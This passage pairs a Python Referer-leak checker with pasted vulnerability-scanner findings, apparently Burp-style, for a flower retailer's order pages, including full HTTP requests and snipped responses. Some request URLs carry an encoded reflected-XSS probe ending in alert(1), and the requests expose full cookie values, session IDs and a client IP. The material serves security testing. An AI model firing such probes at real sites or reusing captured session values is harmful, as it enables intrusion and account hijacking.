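    """Collects (tag, raw_url) for every attribute listed in URL_ATTRS."""

    def __init__(self):
        super().__init__()  # convert_charrefs=True: '&amp;' in attributes becomes '&'
        self.refs = []

    def handle_starttag(self, tag, attrs):
        wanted = URL_ATTRS.get(tag)
        if not wanted:
            return
        for name, value in attrs:
            if name in wanted and value:
                self.refs.append((tag, value))


def cross_domain_targets(page_url, html):
    """Return {host: [(tag, absolute_url), ...]} for every reference in `html`
    whose host differs from the host of `page_url`. Relative URLs resolve
    against the page URL and are therefore never cross-domain."""
    page_host = urlparse(page_url).hostname
    collector = _RefCollector()
    collector.feed(html)
    targets = {}
    for tag, raw in collector.refs:
        absolute = urljoin(page_url, raw)
        host = urlparse(absolute).hostname
        if not host or host == page_host:
            continue
        targets.setdefault(host, []).append((tag, absolute))
    return targets


def referer_leak_report(page_url, html):
    """The scanner's condition: the page was loaded from a URL with a query
    string AND the response links to other domains. Returns
    (query_string, {host: [...]}); both are empty when there is nothing to leak."""
    query = urlparse(page_url).query
    if not query:
        return "", {}
    return query, cross_domain_targets(page_url, html)


# Constructed sample input (hypothetical session id, trimmed query string).
SAMPLE_PAGE_URL = (
    "https://orders.proflowers.com/OrderProcess/(S(sessionid))/ChangeCardMessage.aspx"
    "?tile=hmpg_podA&pid=30008396&Ref=HomeNoRef"
)

SAMPLE_HTML = """
<html><head>
<link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css' rel='stylesheet' type='text/css' />
</head><body>
<a href="http://www.proflowers.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef">Home</a>
<script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
<img src="/OrderProcess/images/spacer.gif" />
<a href="IdentifyCustomer.aspx?op=new">Next</a>
<form action="https://orders.proflowers.com/OrderProcess/Checkout.aspx" method="post"></form>
</body></html>
"""

if __name__ == "__main__":
    leaked_query, hosts = referer_leak_report(SAMPLE_PAGE_URL, SAMPLE_HTML)
    print("query string sent as Referer:", leaked_query)
    for host, refs in sorted(hosts.items()):
        for tag, url in refs:
            print(f"  {host:24s} <{tag}> {url}")
```

Two caveats when reading the output. First, the check compares hostnames only, so a sibling such as www.proflowers.com is reported alongside genuine third parties like cdn.mercent.com; whether a sibling host counts as "other" is a judgement call the report does not make. Second, the leak depends on browser defaults of the time: since Chrome 85 and Firefox 87 the default policy is strict-origin-when-cross-origin, which strips the path and query from cross-origin Referers, so a `tile=` value like the one in the request below no longer reaches the CDN unless the page opts back in with a weaker Referrer-Policy.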

Request

GET /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=293461 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:11 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253A%25253A%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:21:25 GMT
Content-Length: 62175


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_brandfonts.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_shoppingcart.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_opfaq.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><title>
...[SNIP]...
</div>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</head>

   <body id="ctl00_OrderPageBody__bodyControl" marginwidth="0" bgColor="#ffffff" background="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/images/Background_PFC.gif" topMargin="0" marginheight="0" leftMargin="0" link="#5A1300" alink="#5A1300" vLink="#5A1300"></body>
...[SNIP]...
</div>
                               
                               <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/orderprocessoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
href="http://www.proflowers.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;ssid=27&amp;Ref=HomeNoRef&amp;COBRAND=pfc" style="display:inline-block;height:30px;width:179px;"><img class="PFLogoOP" height="30px" width="179px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Go to Proflowers Homepage" style="border-width:0px;" /></a>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<td><img id="ctl00_ProgessBar1_imagedatalist_ctl00_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step1_GiftOptions_Checked.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl01_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/CardMessageMiddle_selected.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl02_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step_SignIn_FutureStep.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl03_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step_Delivery_FutureStep.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl04_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step_Billing_FutureStep.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl05_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step_PlaceOrder_FutureStep.gif" style="border-width:0px;" /></td>
...[SNIP]...
<div class="SectionContainer">
       <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/views_cardmessage.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<td class="LargeMiscColumn">
   
       <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/views_cardmessagepreview.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<div id="FaqOuterContainer" ><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="SelectedProductSummary_ProductImageContainer" style="margin-bottom:10px;"> <img id="ctl00_RightSidebarSpaceTop_ctl00_FeatureProductList_ctl00__productImg" border="0" src="https://a248.e.akamai.net/7/248/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6insucculent_zinc09_l?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=120&amp;hei=140" style="height:140px;width:120px;border-width:0px;" /><!--[.net]-->
...[SNIP]...
<td id="SelectedAccessory_image" style="height:60px; min-width:0;"> <img id="ctl00_RightSidebarSpaceTop_ctl00_FeatureProductList_ctl00_selectedAccessories_productList_ctl00_ctl00__productImage" src="https://a248.e.akamai.net/7/248/497/0001/image.proflowers.com/is/image/ProvideCommerce/zinc08_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=60&amp;hei=60" style="height:60px;width:60px;border-width:0px;" /> </td>
...[SNIP]...
gn.com/splash?form_file=fdf/splash.fdf&dn=ORDERS.PROFLOWERS.COM&lang=en','Verisign','width=560,height=500,directories=no,location=yes,menubar=no,scrollbars=yes,status=yes,toolbar=no,resizable=yes');" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/VeriSignSecurity.gif" style="border: 0px;"/></a>
...[SNIP]...
e is prohibited.
* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.
* http://www.opinionlab.com
-->

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine_pr.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_enginered.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</span><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" title=" site feedback"></a>
...[SNIP]...

16.12. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx?flexShown=False&scAddItem=true&flexChosen=False&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&selectedrelationshipID=293461&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&trackingpgroup=PBS&deliveryon=True HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=293461
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:11 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253A%25253A%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:22:05 GMT
Content-Length: 49219


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_brandfonts.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_shoppingcart.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_opfaq.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><title>
...[SNIP]...
</div>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</head>

   <body id="ctl00_OrderPageBody__bodyControl" marginwidth="0" bgColor="#ffffff" background="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/images/Background_PFC.gif" topMargin="0" marginheight="0" leftMargin="0" link="#5A1300" alink="#5A1300" vLink="#5A1300"></body>
...[SNIP]...
</div>
                               
                               <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/orderprocessoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
href="http://www.proflowers.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;ssid=27&amp;Ref=HomeNoRef&amp;COBRAND=pfc" style="display:inline-block;height:30px;width:179px;"><img class="PFLogoOP" height="30px" width="179px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Go to Proflowers Homepage" style="border-width:0px;" /></a>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<td><img id="ctl00_ProgessBar1_imagedatalist_ctl00_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step1_GiftOptions_Checked.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl01_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/CardMessageMiddle_Complete.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl02_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step_SignIn_Selected.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl03_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step_Delivery_FutureStep.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl04_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step_Billing_FutureStep.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl05_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step_PlaceOrder_FutureStep.gif" style="border-width:0px;" /></td>
...[SNIP]...
<div class="TopSpacer" style="margin-bottom: 10px;"> <img border="0" alt="5 Brands 1 Login" class="consIcon" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/proplants/images/PRVD_76x30_5brands_1login_onWhite.gif" style="border-width:0px;" /> <input type="submit" name="ctl00$OrderProcessPageBody$ctl05$_submitLoginInformationBtn" value="Sign In >
...[SNIP]...
<div class="consBanner"> <img border="0" alt="" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/proplants/images/PRVD_558x74_5brands_1login.jpg" style="border-width:0px;" /> </div>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<div id="FaqOuterContainer" ><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="SelectedProductSummary_ProductImageContainer" style="margin-bottom:10px;"> <img id="ctl00_RightSidebarSpaceTop_ctl00_FeatureProductList_ctl00__productImg" border="0" src="https://a248.e.akamai.net/7/248/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6insucculent_zinc09_l?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=120&amp;hei=140" style="height:140px;width:120px;border-width:0px;" /><!--[.net]-->
...[SNIP]...
<td id="SelectedAccessory_image" style="height:60px; min-width:0;"> <img id="ctl00_RightSidebarSpaceTop_ctl00_FeatureProductList_ctl00_selectedAccessories_productList_ctl00_ctl00__productImage" src="https://a248.e.akamai.net/7/248/497/0001/image.proflowers.com/is/image/ProvideCommerce/zinc08_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=60&amp;hei=60" style="height:60px;width:60px;border-width:0px;" /> </td>
...[SNIP]...
gn.com/splash?form_file=fdf/splash.fdf&dn=ORDERS.PROFLOWERS.COM&lang=en','Verisign','width=560,height=500,directories=no,location=yes,menubar=no,scrollbars=yes,status=yes,toolbar=no,resizable=yes');" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/VeriSignSecurity.gif" style="border: 0px;"/></a>
...[SNIP]...
e is prohibited.
* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.
* http://www.opinionlab.com
-->

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine_pr.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_enginered.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</span><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" title=" site feedback"></a>
...[SNIP]...

16.13. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f24%2f2011&pid=30003767&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=168084 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253APLA7139-8%252522PeaceLily(Sympathy)%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:12:52 GMT
Content-Length: 46799


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_brandfonts.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_shoppingcart.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_opfaq.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><title>
...[SNIP]...
</div>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</head>

   <body id="ctl00_OrderPageBody__bodyControl" marginwidth="0" bgColor="#ffffff" background="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/images/Background_PFC.gif" topMargin="0" marginheight="0" leftMargin="0" link="#5A1300" alink="#5A1300" vLink="#5A1300"></body>
...[SNIP]...
</div>
                               
                               <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
